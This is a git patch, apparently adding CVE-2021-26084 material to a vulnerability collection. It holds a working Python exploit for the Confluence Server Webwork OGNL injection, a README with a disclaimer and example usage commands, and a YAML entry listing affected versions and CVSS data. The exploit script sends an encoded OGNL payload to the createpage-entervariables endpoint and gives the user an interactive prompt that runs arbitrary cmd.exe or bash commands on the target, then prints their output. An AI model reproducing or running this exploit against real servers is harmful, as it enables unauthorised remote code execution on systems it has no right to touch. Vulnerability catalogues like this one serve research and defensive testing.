From 3e8f25e48f9b5f1c795b103d2f49f62cba0fca95 Mon Sep 17 00:00:00 2001 From: yangjipeng Date: Thu, 20 Oct 2022 14:12:38 +0800 Subject: [PATCH 1/2] ADD CVE-2021-26084 --- .../{ => 2019}/yaml/CVE-2019-3396.yaml | 0 .../Confluence_OGNLInjection.py | 73 +++++++++++++++++++ cve/confluence/2021/CVE-2021-26084/README.md | 35 +++++++++ cve/confluence/2021/yaml/CVE-2021-26084.yaml | 50 +++++++++++++ 4 files changed, 158 insertions(+) rename cve/confluence/{ => 2019}/yaml/CVE-2019-3396.yaml (100%) create mode 100644 cve/confluence/2021/CVE-2021-26084/Confluence_OGNLInjection.py create mode 100644 cve/confluence/2021/CVE-2021-26084/README.md create mode 100644 cve/confluence/2021/yaml/CVE-2021-26084.yaml diff --git a/cve/confluence/yaml/CVE-2019-3396.yaml b/cve/confluence/2019/yaml/CVE-2019-3396.yaml similarity index 100% rename from cve/confluence/yaml/CVE-2019-3396.yaml rename to cve/confluence/2019/yaml/CVE-2019-3396.yaml diff --git a/cve/confluence/2021/CVE-2021-26084/Confluence_OGNLInjection.py b/cve/confluence/2021/CVE-2021-26084/Confluence_OGNLInjection.py new file mode 100644 index 00000000..a105a62d --- /dev/null +++ b/cve/confluence/2021/CVE-2021-26084/Confluence_OGNLInjection.py @@ -0,0 +1,73 @@ +#!/usr/bin/python3 + +# Exploit Title: Confluence Server Webwork OGNL injection (PreAuth-RCE) +# Google Dork: N/A +# Date: 09/01/2021 +# Exploit Author: h3v0x +# Vendor Homepage: https://www.atlassian.com/ +# Software Link: https://www.atlassian.com/software/confluence/download-archives +# Version: All < 7.12.x versions before 7.12.5 +# Tested on: Linux Distros +# CVE : CVE-2021-26084 + +# References: +# https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html +# https://github.com/httpvoid/writeups/blob/main/Confluence-RCE.md + +import requests +import optparse +from bs4 import BeautifulSoup +import optparse +from requests.packages import urllib3 +urllib3.disable_warnings() + +parser = optparse.OptionParser() +parser.add_option('-u', '--url', action="store", dest="url", help="Base target host: http://confluencexxx.com") +parser.add_option('-p', '--path', action="store", dest="path", help="Path to exploitation: /pages/createpage-entervariables.action?SpaceKey=x", default="/pages/createpage-entervariables.action?SpaceKey=x") + +options, args = parser.parse_args() +session = requests.Session() + +url_vuln = options.url +endpoint = options.path + + +if not options.url: + + print('[+] Specify an url target') + print('[+] Example usage: exploit.py -u http://xxxxx.com -p /pages/createpage-entervariables.action?SpaceKey=x') + print('[+] Example help usage: exploit.py -h') + exit() + + +def banner(): + + print('---------------------------------------------------------------') + print('[-] Confluence Server Webwork OGNL injection') + print('[-] CVE-2021-26084') + print('[-] https://github.com/h3v0x') + print('--------------------------------------------------------------- \n') + + +def cmdExec(): + + while True: + + cmd = input('> ') + + xpl_url = url_vuln + endpoint + xpl_headers = {"User-Agent": "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", + "Connection": "close", + "Content-Type": "application/x-www-form-urlencoded", + "Accept-Encoding": "gzip, deflate"} + xpl_data = {"queryString": "aaaaaaaa\\u0027+{Class.forName(\\u0027javax.script.ScriptEngineManager\\u0027).newInstance().getEngineByName(\\u0027JavaScript\\u0027).\\u0065val(\\u0027var isWin = java.lang.System.getProperty(\\u0022os.name\\u0022).toLowerCase().contains(\\u0022win\\u0022); var cmd = new java.lang.String(\\u0022"+cmd+"\\u0022);var p = new java.lang.ProcessBuilder(); if(isWin){p.command(\\u0022cmd.exe\\u0022, \\u0022/c\\u0022, cmd); } else{p.command(\\u0022bash\\u0022, \\u0022-c\\u0022, cmd); }p.redirectErrorStream(true); var process= p.start(); var inputStreamReader = new java.io.InputStreamReader(process.getInputStream()); var bufferedReader = new java.io.BufferedReader(inputStreamReader); var line = \\u0022\\u0022; var output = \\u0022\\u0022; while((line = bufferedReader.readLine()) != null){output = output + line + java.lang.Character.toString(10); }\\u0027)}+\\u0027"} + rawHTML = session.post(xpl_url, headers=xpl_headers, data=xpl_data, verify=False) + + soup = BeautifulSoup(rawHTML.text, 'html.parser') + queryStringValue = soup.find('input',attrs = {'name':'queryString', 'type':'hidden'})['value'] + print(queryStringValue) + + +banner() +cmdExec() + diff --git a/cve/confluence/2021/CVE-2021-26084/README.md b/cve/confluence/2021/CVE-2021-26084/README.md new file mode 100644 index 00000000..6623642a --- /dev/null +++ b/cve/confluence/2021/CVE-2021-26084/README.md @@ -0,0 +1,35 @@ +# CVE-2021-26084 - Confluence Server Webwork OGNL injection + +- An OGNL injection vulnerability exists that would allow an authenticated user and in some instances unauthenticated user to execute arbitrary code on a Confluence Server or Data Center instance. + + +### IMPORTANT +This exploit is only intended to facilitate demonstrations of the vulnerability by researchers. I disapprove of illegal actions and take no responsibility for any malicious use of this script. The proof of concept demonstrated in this repository does not expose any hosts and was performed with permission. + + +#### • queryString param Request +![]()![BurpRequest](https://user-images.githubusercontent.com/6265911/131630570-857df5dd-525d-43ec-9466-5c92ac9c1322.png) + + +### Exploit Usage + +#### Commands: +`$ python3 Confluence_OGNLInjection.py -u http://xxxxx.com ` + +#### or +`$ python3 Confluence_OGNLInjection.py -u http://xxxxx.com -p /pages/createpage-entervariables.action?SpaceKey=x ` + + + +#### • Exploitation with Confluence_OGNLInjection.py +![Exploit](https://user-images.githubusercontent.com/6265911/131630805-147628fc-7772-47be-943e-12d24b052adb.png) + + + +- References: + +https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html + +https://github.com/httpvoid/writeups/blob/main/Confluence-RCE.md + +https://www.exploit-db.com/exploits/50243 diff --git a/cve/confluence/2021/yaml/CVE-2021-26084.yaml b/cve/confluence/2021/yaml/CVE-2021-26084.yaml new file mode 100644 index 00000000..ae6294f5 --- /dev/null +++ b/cve/confluence/2021/yaml/CVE-2021-26084.yaml @@ -0,0 +1,50 @@ +id: CVE-2021-26084 +source: https://github.com/h3v0x/CVE-2021-26084_Confluence +info: + name: Confluence是一个专业的企业知识管理与协同软件,可用于构建企业wiki。 + severity: critical + description: | + 8月25日, Atlassian官方披露了一个关于Confluence 的一个高危漏洞, OGNI注入漏洞, 此漏洞允许经过身份验证或在某些情况下未授权的攻击者在Confluence Server或Data Center实例上执行任意代码。 + scope-of-influence: + All 4.x.x versions + All 5.x.x versions + All 6.0.x versions + All 6.1.x versions + All 6.2.x versions + All 6.3.x versions + All 6.4.x versions + All 6.5.x versions + All 6.6.x versions + All 6.7.x versions + All 6.8.x versions + All 6.9.x versions + All 6.10.x versions + All 6.11.x versions + All 6.12.x versions + All 6.13.x versions before 6.13.23 + All 6.14.x versions + All 6.15.x versions + All 7.0.x versions + All 7.1.x versions + All 7.2.x versions + All 7.3.x versions + All 7.4.x versions before 7.4.11 + All 7.5.x versions + All 7.6.x versions + All 7.7.x versions + All 7.8.x versions + All 7.9.x versions + All 7.10.x versions + All 7.11.x versions before 7.11.6 + All 7.12.x versions before 7.12.5 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2021-26084 + - https://jira.atlassian.com/browse/CONFSERVER-67940 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2021-26084 + cwe-id: CWE-74 + cnvd-id: None + kve-id: None + tags: RCE,cve2021,OGNI注入 \ No newline at end of file -- Gitee From 28f73442565fba14f636261fb7e9aa2a2d010fe3 Mon Sep 17 00:00:00 2001 From: yangjipeng Date: Thu, 20 Oct 2022 14:14:26 +0800 Subject: [PATCH 2/2] ADD CVE-2021-26084 --- vulnerability_list.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/vulnerability_list.yaml b/vulnerability_list.yaml index f1290627..14afa0d8 100644 --- a/vulnerability_list.yaml +++ b/vulnerability_list.yaml @@ -17,5 +17,6 @@ cve: - CVE-2021-22205 confluence: - CVE-2019-3396 + - CVE-2021-26084 cnvd: kve: \ No newline at end of file -- Gitee